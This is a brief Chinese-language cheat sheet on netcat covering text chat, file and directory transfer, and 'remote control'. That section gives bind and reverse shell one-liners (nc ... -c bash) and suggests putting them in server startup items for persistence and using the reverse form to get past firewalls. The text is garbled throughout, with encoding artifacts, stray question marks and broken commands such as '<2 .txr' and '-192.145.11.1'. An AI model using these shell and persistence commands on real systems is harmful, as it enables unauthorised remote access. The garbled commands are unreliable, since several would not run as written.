一、nc（瑞士軍刀）

1、-v 輸出詳細的信息 -n 如果后面是域名不會進行dns解析(telnet)

2、文本傳輸:

類似于socket一個作為服務(wù)端，一個作為客戶端。

服務(wù)端：nc -l -p 端口

客戶端： nc -vn ip port

在電子取證的時候會用到。用 | 管道符將客戶端輸出的結(jié)果發(fā)送到服務(wù)端。

傳輸文件：

接收方： nc -lp 333>1.txt?

發(fā)送方：nc -nv 111.11.11.11 333? <2 .txr

3、目錄傳輸

tar -cvf? - xu?

4、遠程控制

方法一； nc -lp 333 -c bash(nc -vn 192.168.22.22 333)

方法二：nc -lp 333 (nc -vn -192.145.11.1 333 -c bash)

可以將該命令寫成腳本，然后放在服務(wù)器的開機啟動項里面。有些網(wǎng)站因為防火墻進制第一種方式，所以可以采用第二種方式。

在window用戶中應(yīng)將bash 改為cmd?

5、缺陷

1、明文傳輸，容易被嗅探（可以通過系統(tǒng)加密方法）

2、缺乏身份驗證機制，不安全，容易被其他人盜用。